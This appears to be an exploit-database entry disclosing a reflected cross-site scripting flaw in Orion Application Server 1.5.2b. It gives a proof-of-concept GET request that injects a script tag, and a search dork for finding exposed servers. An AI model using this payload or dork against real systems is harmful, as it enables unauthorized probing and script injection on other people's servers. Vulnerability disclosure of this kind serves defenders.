## https://sploitus.com/exploit?id=1337DAY-ID-34815
# Orion Application Server - Cross Site Scripting
#
# Tested on: Orion Application Server 1.5.2b
# Date: Ago 09, 2020
# Informer: Pablo Rebolini - <rebolini.pablo[x]gmail.com>
# Cross Site Scripting
# Poc:
GET http://x.x.x.x/%3Cscript%3Ealert(%22xss'ed%22)%3C/script%3E
# Dork: "Orion Application Server" "up and running"
# 0day.today [2020-08-12] #